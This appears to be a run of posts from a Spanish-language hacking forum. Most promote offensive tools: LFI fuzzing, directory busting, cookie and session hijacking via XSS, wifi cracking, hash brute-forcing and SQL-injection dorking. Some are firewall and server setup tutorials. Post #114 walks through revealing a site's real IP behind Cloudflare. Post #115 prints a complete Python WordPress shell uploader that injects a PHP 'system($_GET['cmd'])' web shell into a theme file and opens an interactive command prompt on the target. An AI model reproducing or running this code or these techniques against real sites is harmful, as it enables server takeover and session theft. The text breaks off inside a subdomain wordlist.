Ahora bien, la pregunta del millon seria, como solucionar esto, pues en realidad Wordpress en Julio de 2013 saco una actualizacion del pingback la cual no surgio para nada efecto es mas si ahora mismo te instalas WP con su ultima actualizacion, seguiras siendo victima de estos ataques, para lo cual tengo 2 posibles soluciones

1.- Borra este archivo que en realidad, yo ni lo utilizo
2.- Renombralo si es que lo utilizas con un nombre poco común

Como dije han sacado muchos parches y soluciones con htaccess pero recomiendo borrar el archivo para evitar el problema...

saludos...
#100
Python / LFI Fuzzploit Tool 1.1
Octubre 23, 2013, 12:00:54 PM
LFI Fuzzploit es una herramienta simple para ayudar en el fuzzing, encontrar y explotar las vulnerabilidades de los locales de archivos de inclusión de aplicaciones basadas en Linux PHP. Uso de codificación especial y técnicas de fuzzing, lfi_fuzzploit buscará algunos conocidos y otros no tan conocidos LFI filtro de circunvalación y explota con cierta codificación avanzada / bypass métodos para tratar de eludir la seguridad y lograr su objetivo, que es en última instancia, la explotación de una inclusión de archivo local.


Descarga: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#101
Bugs y Exploits / Web Directorio Buster
Octubre 19, 2013, 12:57:12 AM
Directorio Buster Web es una herramienta gratuita para descubrir remotamente los archivos ocultos o carpetas en cualquier sitio web.

Esta herramienta será de gran ayuda las pruebas de intrusión para averiguar los archivos jugosas ocultas que contienen contraseñas u otra información importante. Incluso los propietarios de sitios web pueden utilizarla para eliminar cualquier tipo de archivos importantesantes de agresores a encontrar.
Junto con diccionario y fuerza bruta ataque basado en este programa garantiza el descubrimiento de la mayoría de los nombres de archivos complicados. Método Diccionario ayuda en la búsqueda de archivos comunes que como método de fuerza bruta le ayudarán a descubrir los nombres de archivos al azar / recinto. Además, le permite personalizar la búsqueda por la elección de los tipos de extensiones de archivo para que pueda buscar los archivos específicos, tales como texto, zip , cfg, xml, etc Usted puede ajustar aún más el diccionario y el ataque de fuerza bruta mediante la alteración de los parámetros por defecto. Viene con instalador integrado y trabaja en una amplia gama de plataformas a partir de Windows 98 a la última versión, Windows 7.

Características

Gratis y fácil de usar
Apoye Windows 98, ME, NT, 2000, XP, 2003, Vista y Win 7 Sistemas
Descubre los nombres de archivos y carpetas ocultos en cualquier sitio web
Útil para pentesters y propietarios de sitios web para descubrir los archivos / carpetas ocultos.
Diccionario Ataque ayuda en el descubrimiento de los nombres de archivo de uso común en el sitio web.
Soporta ataque de fuerza bruta para descubrir los nombres de archivos / carpetas al azar.
Con una interfaz gráfica de usuario elegante, el usuario puede ajustar los parámetros con facilidad antes de iniciar el proceso de recuperación


Cómo utilizar?

WebDirectoryBuster es fácil de usar, con su sencilla interfaz gráfica de usuario, incluso para principiantes. Estos son los breves detalles de uso,

Ejecutar "Buster Directorio Web" mediante los accesos directos en el escritorio o en el menú de inicio.
Introduzca la URL del sitio web cuyo nombre de archivo / carpeta por descubrir.
Especifique los tipos de archivo (txt, zip, rar, etc) que desea buscar.
A continuación, introduzca la ruta del archivo de salida donde se registrarán todos los nombres de archivos encontrados.
A continuación, seleccione Diccionario / método de fuerza bruta e introduzca los parámetros relevantes.
Por último, haga clic en Inicio botón para comenzar

Descarga: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

#102

Hola, en el siguiente tutorial veremos la instalacion de ConfigServer Security & Firewall (CSF) + Webmin para tener una administracion web de nuestro servidor centOS y nuestro firewall csf, bueno actualmente he utilizado varias veces este firewall y me ha funcionado super bien, he logrado configurarlo a tal modo que bloquea ips por scan de puertos y bueno todo depende de como lo configuremos y el nivel de seguridad que necesitemos, ahora vamos con la instalación:

Bueno procederemos a descargar el paquete:

#wget No tienes permitido ver enlaces. Registrate o Entra a tu cuenta


Extraer el archivo:

# tar xfz csf.tgz

Vamos al directorio extraido:

cd csf

y instalamos:

sh No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Luego de esto si todo va correcto, ya tendremos instalado nuestro csf en el sistema, queda empezar a configurar todos los aspectos en el siguiente archivo: vim /etc/csf/csf.conf.

Lo primero que debemos cambiar, es el modo testing :

Código: bash

TESTING = "1"

dejar asi

TESTING = "0"


y bueno configurar todo lo demas como queramos, luego de esto podemos reiniciar nuestro firewall con csf -r, para bloquear ips manualmente podemos hacerlo con:

csf -d ip (ejemplo csf -d 192.564.232.234

Para agregar una ip a permitidas lo haremos con csf -a ip (csf -a 192.564.232.234)


Descargamos el paquete:

wget No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Instalamos:

rpm -U webmin-1.660-1.noarch.rpm

Bueno lo primero que debemos hacer es abrir nuestro puerto 10000, para poder acceder mediante web, ejemplo : 127.0.0.1:10000, donde el localhost seria nuestra ip publica,

Bueno ingresamos a webmin y nos logeamos con nuestros datos root, lo primero que veremos sera la interfaz de webmin:


Vamos a Webmin > Webmin Configuration y luego


Webmin Modules

En  From local file pondremos lo siguiente:

/etc/csf/csfwebmin.tgz


Tendremos acceso a csf en :

[–]
System
Bootup and Shutdown
Change Passwords
ConfigServer Security & Firewall


En el area ConfigServer Security & Firewall


Bueno desde hay podemos gestionar el bloqueo y desbloqueo de ips,
gestionar las configuraciones, el nivel de seguridad de el firewall, entre otras cosas,
eso seria todo, un saludo !
#103
Bugs y Exploits / Session Hijacking con Cookie Cadger
Octubre 10, 2013, 02:53:20 AM

Hola, les paso a dejar este programa muy bueno llamado Cookie cadger con el cual podemos obtener sesiones y logins, funciona en Windows, Linux o Mac, y requiere Java 7. Usando Cadger Cookies requiere tener "tshark" - una utilidad que forma parte de la suite de Wireshark, que se instalará. Por lo general, simplemente instalando Wireshark será suficiente.

Además, para capturar los paquetes promiscuamente requiere hardware compatible. Capturar el tráfico Wi-Fi requiere hardware capaz de modo monitor, y el conocimiento de cómo colocar el dispositivo en modo monitor.

Cookie Cadger puede ser descargado desde aqui: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

y su uso aqui: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Ademas les dejo un video de youtube mostrando su uso, un saludo !

#104
Python / Sbox Project Penetration testing
Octubre 07, 2013, 08:54:18 PM
sb0x es una caja de herramientas para pruebas de penetración ..



Ruquirment Sistema: para ejecutar sb0x necesita instalar Python 2.7.x

Características Herramientas:

1. WordPress fuerza bruta
2. Escáner servidor
3. Web de administración buscador
4. FTP fuerza bruta del servidor
5. Perl bind shell
6. DSL fuerza bruta enrutador
7. NETGEAR fuerza bruta Router
8. MS12-020 de Windows RDP Dos explotar


Descarga: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#105
Seguridad Wireless / Xiaopan S.O
Octubre 03, 2013, 06:05:17 PM
Xiaopan OS es una herramienta fácil de usar paquete de software para los principiantes y expertos, que incluye una serie de herramientas de hacking avanzadas para penetrar WPA / WPA2 / WPS / redes inalámbricas WEP. Basado en el sistema de Tiny Core Linux (TCL) operativo (OS), tiene una interfaz gráfica de usuario slick (GUI) que requiere sin necesidad de escribir comandos de Linux. Xiaopan sistema operativo es Windows, Mac y compatible con Linux y los usuarios pueden simplemente instalar y arrancar este ~ 70mb OS a través de un pen drive USB o en una máquina virtual (VM) medio ambiente. Algunas de las herramientas con las inflador, Aircrack-ng, minidwep GTK, XFE, wifite y biberón. Tarjetas compatibles incluyen RTL8187L, RT3070, AR9271 y muchos más.

Características
Ejecutar en Parallels Desktop / VMware / VirtualBox
Compatible con Yumi Boot / LiLi USB Creator
Ejecute el CD en vivo
Los paquetes incluyen: minidwep, Aircrack, inflador, Reaver, Biberón, Wifite
70mb ISO
Basado en TinyCore Linux
Requisitos mínimos recomendados: Pentium 2 o superior, 128 MB de RAM + swap de algunos
Recomendado: tarjeta USB inalámbrico que soporte el modo monitor y la inyección
De Windows / Linux / Mac Compatible






Web Descarga: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Saludos !
#106
Java / JBrute
Octubre 01, 2013, 05:15:13 AM
Hola, les paso a dejar esta herramienta escrita en java :

JBrute es una herramienta de código abierto escrito en Java para auditar la seguridad y la fortaleza de la contraseña almacenada para varios de código abierto y aplicaciones comerciales. Está enfocado a proveer soporte multi-plataforma y parámetros flexibles para cubrir la mayor parte de los escenarios posibles contraseña auditoría.

Soporta:

MD5
MD4
SHA-256
SHA-512
MD5CRYPT
SHA1
ORACLE-10G
ORACLE-11G
NTLM
LM
MSSQL-2000
MSSQL-2005
MSSQL-2012
MYSQL-322
MYSQL-411
POSTGRESQL
SYBASE-ASE1502

blog: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta



Mas info y Descarga: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#107

Hola a todos, bueno en el siguiente tuto veremos como detener algunos ataques que salen cada dia. He andado en varios foros diferentes de tipo SMF, los cuales han sufrido ataques de tipo Proxy, con diferentes herramientas, lamentablemente el CMS mencionado cae facilmente con este tipo de ataques, por mucho antiddos que tengamos, firewalls y otras cosas, a menos que logremos bloquear de manera efectiva todas las ips atacantes, caera igual incluso usando cloudflare.

Veremos una opción en la configuración de cloudflare, para esto tenemos 2 dominios protegidos con cloudflare, pero los 2 configurados de distinta manera, una de la default y otra personalizada.



Bueno vemos los 2 ping, los 2 con cloudflare
Luego de esto, nos iremos a las configuraciones de nuestro sitio en cloudflare, tal y como esta en la siguiente
imagen :


Bueno esta opcion en simple palabras declara que estan penetrando el nivel mas alto de seguridad
y declararemos que estamos bajo un ataque grande, a la vez con esto cuando entremos
a nuestro website tendremos una verificacion como esta:


Analizando un poco el código veremos la siguiente verificación:


Bueno como podemos analizar tenemos una suma que se realiza, para
denegarnos o bien aceptar nuestro acceso al sitio

Para ver el funcionamiento realiza un video donde se resume todo lo visto,
la herramienta utilizada para las pruebas de stress test se encuenta aqui :
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
dando los creditos al creador de la tool

Video:


Saludos!!
#108
Python / The Canari Framework
Septiembre 10, 2013, 02:33:46 AM

Canari es un marco de desarrollo de transformación para Maltego escrito en Python. El enfoque original de Canari era proporcionar un conjunto de transformaciones que ayudarían en la ejecución de pruebas de penetración, y evaluaciones de vulnerabilidad. Desde su primer prototipo, se ha hecho evidente que el marco puede ser utilizado para mucho más que eso. Canari es perfecto para cualquiera que desee representar gráficamente los datos en Maltego sin la molestia de aprender un montón de cosas innecesarias. Se ha generado interés por parte de los analistas forenses digitales y pentesters.

Características fundamentales de Canari incluyen:

- Un fácilmente extensible y configurable marco que promueva la máxima reutilización ;
- Un conjunto de potentes y fáciles de utilizar secuencias de comandos para la depuración, la configuración y la instalación de transformaciones;
- Por último, un gran número de la comunidad siempre se transforma .

Web del proyecto: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Videos relacionados al proyecto: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Mas información: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Saludos !
#109
Bugs y Exploits / Session Hijacking con CookieCatcher
Agosto 31, 2013, 04:12:41 AM
CookieCatcher es una aplicación de código abierto que fue creado para ayudar en la explotación de XSS (Cross Site Scripting) vulnerabilidades en aplicaciones web para robar los identificadores de sesión de usuario (también conocido como secuestro de sesión). El uso de esta aplicación es puramente educativo y no debe ser utilizado sin la autorización correspondiente de la aplicación de destino.

Para obtener más información acerca de XSS visite el siguiente enlace: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta (XSS)

Para obtener más información sobre secuestro de sesión, visite el siguiente enlace: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Características

Cargas prediseñados para robar datos de las cookies
Sólo tienes que copiar y pegar carga útil en una vulnerabilidad XSS
Enviará notificación por correo electrónico cuando se roban nuevas cookies
Se intentará actualizar las cookies cada 3 minutos para evitar tiempos de espera de inactividad
Proporciona solicitudes completas HTTP para secuestrar sesiones a través de un proxy (Haga eructar, etc)
Intentará cargar una vista previa al ver los datos de la cookie
CAPACIDADES DE CARGA
* Basic AJAX Attack
* HTTPOnly evasión de Apache CVE-20120053
* Más por venir

Requerimientos

CookieCatcher está construido para una pila LAMP ejecutando lo siguiente:

PHP 5.xx
PHP-CURL
MySQL
Lynx y crontab

Una demostración en vivo de la aplicación se puede ver en No tienes permitido ver enlaces. Registrate o Entra a tu cuenta . Se recomienda a los nombres de dominio pequeños para reducir el espacio de carácter necesaria para las cargas útiles.

Video:


Web: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#110
Perl / Sqli Dorking
Agosto 31, 2013, 03:08:40 AM

Esta herramienta Busca paginas vulnerables a un SQLi usando Google o Bing, también acepta una lista de dominios.

uso: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta [-d/-bd ] -p [-l Links.txt]  [-f Logs.txt]



Descarga: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#111
Python / Golismero 2.0
Agosto 29, 2013, 02:48:11 AM
GoLismero es un marco de código abierto para las pruebas de seguridad. . Está orientada actualmente hacia la seguridad web
y gestionar una gran cantidad de herramientas de seguridad bien conocidos (OpenVAS, Wfuzz, sqlmap, DNS Recon, robot analizador ...)

Entre sus caracteristicas estan:

- Independencia de la plataforma real. Probado en Windows, Linux, * BSD y OS X.
- No hay dependencias de bibliotecas nativas. Toda la estructura se ha escrito en Python puro.
- Buen rendimiento en comparación con otros marcos escritos en lenguajes de programación Python y otros.
- Muy fácil de usar.
- Programas de desarrollo es extremadamente simple.
- El marco también recoge y unifica los resultados de las herramientas bien conocidas: sqlmap, xsser, openvas, dnsrecon, theharvester .



Reportes Generados:

Código: bash
python golismero.py <target> -o report.html




Web y mas info..: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Saludos !
#112

Hola, Joomla-Anti-Malware-Scan-Script es un script de auto-servicio que el cual esta programado para detectar malwares en nuestro CMS Joomla. El Script todabia no hace la limpieza por si solo, solamente entrega informes de códigos maliciosos.

El autor del Script, indica que aun no esta en su 100 % , ya que en algunas ocaciones entrega informes de Falsos positivos, pero estará en constante actualización.

Instrucciones de uso:

El uso es muy simple y directa:

1.-   Subir jamss.php al webroot de su cuenta de hosting
2.-   Abra el archivo de escáner en su navegador usando el URL como esta No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
3.-   La secuencia de comandos se ejecutará durante varios segundos, tal vez incluso minutos, dependiendo del número de archivos y carga en su servidor web

Pueden obtener mas información aqui : No tienes permitido ver enlaces. Registrate o Entra a tu cuenta  (al igual que su descarga),

Saludos ! 
#113
Bugs y Exploits / ZMap Internet scanner
Agosto 20, 2013, 04:51:43 AM


ZMap es un escáner de red de código abierto que permite a los investigadores realizar fácilmente estudios de redes de Internet. Con un solo equipo y una red de enlace ascendente bien acondicionada, ZMap es capaz de realizar una exploración completa del espacio de direcciones IPv4 en menos de 45 minutos, acercándose al límite teórico de gigabit Ethernet.

Caracteristicas:

- Testing optimizado: envía conexiones tan rápido como soporte la tarjeta de red, saltando la pila TCP/IP
- No necesita guardar el estado de conexión: selecciona las direcciones de acuerdo a una permutación aleatoria generada por un grupo multiplicativo cíclico.

Web del proyecto: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Descarga: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#114
Bugs y Exploits / Bypass Cloudflare (2 metodos)
Agosto 07, 2013, 07:23:46 AM

Hola, en el siguiente post veremos como bypasear un sitio (en este caso foro)
protegido por cloudflare,

Primeramente nos iremos al Ip Revealer de Underc0de : No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

El cual nos entrega el siguiente resultado:


Claramente no nos entregara la ip verdadera, porque ya esta previamente configurado y no
con las config. por default de cloudflare,

Frente a esto tenemos 2 opciones :

1.- Nos registramos en el foro (en este caso monte el siguiente para no tener problemas ni quejas: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
esperamos nuestro e-mail de confirmación o bien si no pide confirmar, el de perdida de password, y miraremos el codigo de fuente
del mensaje recibido:


Y obtenemos la ip : No tienes permitido ver enlaces. Registrate o Entra a tu cuenta, la cual es la verdadera ip del website, pero

¿Que pasaria si nuestro website usa un mailer externo o no utilizan correos para reestablecer password y registros?

Pues pasaremos al segundo metodo:

2.- Iplogger: Iplogger es un sitio web que te permite ver el tráfico en los archivos de imagen. En este caso
nos entre una url para que podamos acceder al trafico de nuestra imagen y accederemos a la web :

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

En el cual en esta linea "Link to the untagged invisible picture: " nos entrega un link: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Ese link lo pondremos en elegir avatar en el foro de prueba:


Your profile has been updated successfully.

Iremos a la web de iplogger y daremos click en View Log, obteniendo el siguiente resultado:



Espero les haya gustado, un Saludo !
#115
Python / Auto - Wordpress Shell Uploader Beta
Agosto 05, 2013, 12:35:38 AM
Hola, les paso a dejar esta tool que permite cargar shells en sitios con wordpress
para cargarlas se necesita el usuario y la pass del wp-admin :D



Código: bash
#!/usr/bin/env python
#Install mechanize and Beautifulsoup
#easy_install mechanize,BeautifulSoup
#Give full url path to avoid issues
from BeautifulSoup import BeautifulSoup
import mechanize
from django.core.validators import URLValidator
from django.core.exceptions import Validationerror
import urllib2
import sys
import os

def check(main_url):

val = URLValidator(verify_exists=False)
try:
val(main_url)
except Validationerror, e:
print e
br = mechanize.Browser()
         br.set_handle_robots(False)
br.addheaders = [('User-agent', 'Python-urllib/2.6'),('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8')]
# Give user-agent any shit u want

check = br.open(main_url)
html = check.read()
soup = BeautifulSoup(html)
search = soup.findAll('a',href="http://wordpress.org/")
for i in search:
if i['title'] == "Powered by WordPress":
return(1)
else:
exit(1)

def wp_sucker():

try:
br = mechanize.Browser()
                 br.set_handle_robots(False)
         print "[-] Enter the Worpress Site Login"
                 main_url = raw_input()
         stat = check(main_url)
                 if stat == 1:
                         pass
                 else:
                         print "[-] Enter a Wordpress Login Page Dumbass "
                         exit(0)
                                 sys.exit(0)
base_url = main_url.replace('/wp-login.php','')
br.addheaders = [('User-agent', 'Python-urllib/2.6'),('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8')]
br.open(main_url)
br.select_form(nr=0)
print "[-] Enter UserName "
user_name = raw_input()
print "[-] Enter Password"
password = raw_input()
br.form['log'] = user_name
br.form['pwd'] = password
br.form.find_control('redirect_to').readonly = False
br.form['redirect_to'] = base_url+"/wp-admin/themes.php"
page = br.submit()
new = page.read()
#print html
#page = br.open(base_url+"/wp-admin/themes.php").read()
soup = BeautifulSoup(new)
search = soup.findAll('code')
#print search
#themes = ''
print "[-] Themes Available"
for i in search:
print i.text

print "[-] Select the Theme u would Like to upload the Shell"
theme = raw_input()
if theme == "twentyten":
Theme = "Twenty+Ten"
elif theme == "twentyeleven":
Theme ="Twenty+Eleven"
else:
Theme = theme.title()
url = base_url+"/wp-admin/theme-editor.php?file=/themes/%s/archive.php&theme=%s&dir=theme"%(theme,Theme)

br.open(url)
br.select_form(nr=1)
br.form['newcontent'] = "<?php system($_GET['cmd']) ?>"
br.submit()
print "[-] Shell Has been uploaded? Would like to interact.Enter y to interact"
answer = raw_input()
box = base_url.split('/')[2]
if answer == 'Y' or answer == 'y':
while True:
cmd = raw_input(box+"@box~")
if cmd == "exit":
print "[-] Terminal Exited "
print "[-] Shell Uploaded @"+base_url+"/wp-content/themes/%s/archive.php?cmd="%theme
os._exit(0)
#sys.exit(0)
else:
shell_url = base_url+"/wp-content/themes/%s/archive.php?cmd=%s"%(theme,cmd)
page = br.open(shell_url)
print page.read()
else:
print "[-] Shell has Been Uploaded Interact whenever U want"
print "[-] Shell Uploaded @"+base_url+"/wp-content/themes/twentyten/archive.php?cmd="
os._exit(0)
#exit(0)
#sys.exit(0)
except KeyboardInterrupt:
print"[-] trl^C Detected Shutting Down"
else:
print "[-] Something has gone wrong,Plse check ur Url or entered username or pass"
print "[-] Shutting Down"
exit()

def main():
print "-------------------------------------------"
print " Wordpress Shell Uploader"
print " Credits to HR,Phaedrus \n"
print " Login and get themes available for Upload"
print " And Uploads a basic cmd shell"
print "-------------------------------------------"
wp_sucker()
# shell_up()

main()

#EOF
#Hoping to add new shit :)


Author del Script: torque59,

un Saludo !
#116

Nginx es es un código abierto, libre de servidor de alto rendimiento HTTP y proxy inverso, así como un servidor proxy IMAP/POP3. Igor Sysoev comenzó el desarrollo de Nginx en 2002, con la primera versión pública en 2004 . Nginx ahora recibe casi el 12,18% (22.2M) de sitios activos en
todos los dominios. Nginx es conocido por su alto rendimiento, la estabilidad, el rico conjunto de características, configuración sencilla y de bajo consumo de recursos.

Instalacion:

Para empezar con la instalación, primero debemos instalar una dependencia:

Código: bash
# apt-get install build-essential libssl-dev libpcre3-dev


Instalando la librería podemos comenzar con la instalación en pleno de nginx,

Descargamos :

Código: bash
wget http://nginx.org/download/nginx-1.2.6.tar.gz


Lo Descomprimimos:

Código: bash
tar zxvf nginx-1.2.6.tar.gz


Ingresamos al directorio : cd nginx-1.2.6

Y compilamos :

Código: bash
- ./configure
- make
- make install


(recuerden ingresar como root o sudo)

Nginx tiene varios modulos disponibles, los cuales pueden ser descargamos desque aqui : No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Para poder iniciar, reiniciar y parar nuestro nginx, necesitamos de un script, lo descargaremos :

Código: bash
- wget https://raw.github.com/JasonGiedymin/nginx-init-ubuntu/master/nginx
- sudo mv nginx /etc/init.d/nginx
- sudo chmod +x /etc/init.d/nginx
- sudo chown root:root /etc/init.d/nginx


ahora podremos iniciarlo correctamente:

Código: bash
/etc/init.d/nginx start
[ ok ] Starting Nginx Server...:.


Instalación de php5-fpm:

ejecutamos :

Código: bash
apt-get install php5-fpmv


Agregamos la siguiente llave:

Código: bash
- apt-get update 
- wget http://www.dotdeb.org/dotdeb.gpg
- cat dotdeb.gpg | sudo apt-key add -


Y podremos instalar php:

Código: bash
- apt-get install php5-cli php5-suhosin php5-fpm php5-cgi php5-mysql


Lo iniciamos

Código: bash
- /etc/init.d/php5-fpm start


Luego de eso en : /etc/nginx/nginx.conf , haremos los siguientes cambios :

Buscamos la linea que dice:

Código: bash
index                       index.php index.html index.htm;


Y le daremos prioridad a index.php tal como se ve en el ejemplo, luego el bloque

Código: bash
" upstream php " que apunta a PHP-FPM.

upstream php {
server 127.0.0.1:9000;


Y a lo ultimo del archivo agregaremos lo siguiente:

Código: bash
 location ~ \.php$ {
               include fastcgi_params;
               fastcgi_index index.php;
               fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
                              fastcgi_pass php;


Luego agregaremos lo siguiente al final del archivo : /usr/local/nginx/fastcgi_params

Código: bash
fastcgi_connect_timeout 60; 
fastcgi_send_timeout 180;
fastcgi_read_timeout 180;
fastcgi_buffer_size 128k;
fastcgi_buffers 4 256k;
fastcgi_busy_buffers_size 256k;
fastcgi_temp_file_write_size 256k;
fastcgi_intercept_errors on;


Y reiniciamos nuestro nginx : service nginx restart

Instalación en Windows:


Bueno en Windows todo es mas fácil, la instalación de nginx también, primero debemos descargar lo siguiente:

Código: bash
http://www.mediafire.com/download/kzx7jj3b5smv945/winginx-setup.exe


Bueno típico de Windows, solo debemos dar siguiente, siguiente, siguiente...,


En esta parte vamos a elegir que instalar, ya que podemos instalar
mysql, phpmyadmin, php, etc


Y bueno en nuestro disco C, tendremos listo todo instalado simple, en la carpeta se encuentran el Start, el Stop y el Hosteditor, el cual nos servirá para poner nuestra ip publica:


A lo ultimo se ve mi ip agregada, y el nombre de la carpeta contenedora
"zangetsu" y listo, tendremos nuestro servidor corriendo correctamente,

Para ingresar a phpmyadmin, iremos a la dirección No tienes permitido ver enlaces. Registrate o Entra a tu cuenta, con el
user por defecto "root" y ya podremos administrar correctamente,

Un Saludo !
#117
Python / Pyscanlogd - Herramienta Escaneo de Puertos
Julio 27, 2013, 04:02:28 AM
Pyscanlogd es una herramienta de detección de escaneo de puertos de red escrito en Python puro. Es capaz de detectar escaneos de puertos más rápidos e incluso puede detectar escaneos de puertos-de mayor duración hasta una hora. Se puede ejecutar en primer plano y registrar escaneos de la consola, así como un daemon al registrar exploraciones en un archivo.

$ sudo pyscanlogd
listening on eth0:


Citar# Regular scan detection

[2010-03-17 17:23:13]: TCP syn scan (flags:6) from 172.16.220.124 to 172.16.220.214
(ports:256,995,554,8080,3389,139,3306,23,111,993,53,1723)
[2010-03-17 17:23:13]: Continuation of TCP syn scan from 172.16.220.124 to
172.16.220.214 (ports:113,199,21,5900,22,1720,135,587,445,2065,6005,3703,631)
[2010-03-17 17:23:13]: Continuation of TCP syn scan from 172.16.220.124 to
172.16.220.214 (ports:4004,1761,1075,4129,7921,33354,255,55600,1600,1065)
...
[2010-03-17 17:23:47]: TCP x-mas scan (flags:41) from 172.16.220.124 to
66.102.13.104 (ports:110,21,111,1720,993,587,3389,143,199,445,8080,80)
[2010-03-17 17:23:50]: Continuation of TCP x-mas scan from 172.16.220.124 to
66.102.13.104 (ports:443,1025,139,1723,554,5900,113,53,80,8080,995,23)
...

Citar# IDLE scan detection

[2010-03-17 17:24:37]: TCP syn scan (flags:2) from 172.16.220.150 to 209.191.122.70
(ports:21,53,8080,445,443,993,3306,995,110,5900,1720,23)
[2010-03-17 17:24:37]: Continuation of TCP syn scan from 172.16.220.150 to 209.191.122.70
(ports:199,8888,554,25,256,22,135,1025,111,587,143)
[2010-03-17 17:24:38]: Continuation of TCP syn scan from 172.16.220.150 to 209.191.122.70
(ports:80,1723,113,3389,139,3828,555,21,53,8080,445,443)
[2010-03-17 17:24:39]: Continuation of TCP syn scan from 172.16.220.150 to 209.191.122.70
(ports:993,3306,995,110,5900,1720,23,199,8888,554,21,53)
[2010-03-17 17:24:45]: Idle scan (flags: 4) from 172.16.220.124 to 209.191.122.70 (ports:
[21, 53, 8080, 445, 443, 993, 3306, 995, 110, 5900, 1720, 23]) using zombie host
172.16.220.150
...

Citar# Slow scan detection

[2010-03-17 17:32:19]: Possible slow TCP x-mas scan (flags:41) from 172.16.220.124
to 64.208.187.107 (ports:1720,113,139,23), average timediff 10.26s

Web de descarga: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#118
Python / Knock Subdomain Scan
Julio 26, 2013, 09:23:45 PM

Holas, les paso a dejar esta herramienta llamada Knock, la cual sirve para
encontrar subdominios de un dominio, esta escrito en python,
y tiene soporte para linux y Windows,

Código: python
#!/usr/bin/env python

# -------------------------------------------------------
# Knock v1.5 - 23/08/2011
# By Gianni 'guelfoweb' Amato http://knock.googlecode.com
#
# This code is released under the GNU / GPL v3
# You are free to use, edit and redistribuite it
# under the terms of the GNU / GPL license.
# -------------------------------------------------------

import sys
import os
import httplib
import socket
from time import strftime
import random
import time

wlist_array = ["0","01","02","03","1","10","11","12","13","14","15","16","17","18","19","2","20","3","3com","4","5","6","7","8","9","ILMI","a","a.auth-ns","a01","a02","a1","a2","abc","about","ac","academico","acceso","access","accounting","accounts","acid","activestat","ad","adam","adkit","admin","administracion","administrador","administrator","administrators","admins","ads","adserver","adsl","ae","af","affiliate","affiliates","afiliados","ag","agenda","agent","ai","aix","ajax","ak","akamai","al","alabama","alaska","albuquerque","alerts","alpha","alterwind","am","amarillo","americas","an","anaheim","analyzer","announce","announcements","antivirus","ao","ap","apache","apollo","app","app01","app1","apple","application","applications","apps","appserver","aq","ar","archie","arcsight","argentina","arizona","arkansas","arlington","as","as400","asia","asterix","at","athena","atlanta","atlas","att","au","auction","austin","auth","auto","av","aw","ayuda","az","b","b.auth-ns","b01","b02","b1","b2","b2b","b2c","ba","back","backend","backup","baker","bakersfield","balance","balancer","baltimore","banking","bayarea","bb","bbdd","bbs","bd","bdc","be","bea","beta","bf","bg","bh","bi","billing","biz","biztalk","bj","black","blackberry","blog","blogs","blue","bm","bn","bnc","bo","bob","bof","boise","bolsa","border","boston","boulder","boy","br","bravo","brazil","britian","broadcast","broker","bronze","brown","bs","bsd","bsd0","bsd01","bsd02","bsd1","bsd2","bt","bug","buggalo","bugs","bugzilla","build","bulletins","burn","burner","buscador","buy","bv","bw","by","bz","c","c.auth-ns","ca","cache","cafe","calendar","california","call","calvin","canada","canal","canon","careers","catalog","cc","cd","cdburner","cdn","cert","certificates","certify","certserv","certsrv","cf","cg","cgi","ch","channel","channels","charlie","charlotte","chat","chats","chatserver","check","checkpoint","chi","chicago","ci","cims","cincinnati","cisco","citrix","ck","cl","class","classes","classifieds","classroom","cleveland","clicktrack","client","clientes","clients","club","clubs","cluster","clusters","cm","cmail","cms","cn","co","cocoa","code","coldfusion","colombus","colorado","columbus","com","commerce","commerceserver","communigate","community","compaq","compras","con","concentrator","conf","conference","conferencing","confidential","connect","connecticut","consola","console","consult","consultant","consultants","consulting","consumer","contact","content","contracts","core","core0","core01","corp","corpmail","corporate","correo","correoweb","cortafuegos","counterstrike","courses","cr","cricket","crm","crs","cs","cso","css","ct","cu","cust1","cust10","cust100","cust101","cust102","cust103","cust104","cust105","cust106","cust107","cust108","cust109","cust11","cust110","cust111","cust112","cust113","cust114","cust115","cust116","cust117","cust118","cust119","cust12","cust120","cust121","cust122","cust123","cust124","cust125","cust126","cust13","cust14","cust15","cust16","cust17","cust18","cust19","cust2","cust20","cust21","cust22","cust23","cust24","cust25","cust26","cust27","cust28","cust29","cust3","cust30","cust31","cust32","cust33","cust34","cust35","cust36","cust37","cust38","cust39","cust4","cust40","cust41","cust42","cust43","cust44","cust45","cust46","cust47","cust48","cust49","cust5","cust50","cust51","cust52","cust53","cust54","cust55","cust56","cust57","cust58","cust59","cust6","cust60","cust61","cust62","cust63","cust64","cust65","cust66","cust67","cust68","cust69","cust7","cust70","cust71","cust72","cust73","cust74","cust75","cust76","cust77","cust78","cust79","cust8","cust80","cust81","cust82","cust83","cust84","cust85","cust86","cust87","cust88","cust89","cust9","cust90","cust91","cust92","cust93","cust94","cust95","cust96","cust97","cust98","cust99","customer","customers","cv","cvs","cx","cy","cz","d","dallas","data","database","database01","database02","database1","database2","databases","datastore","datos","david","db","db0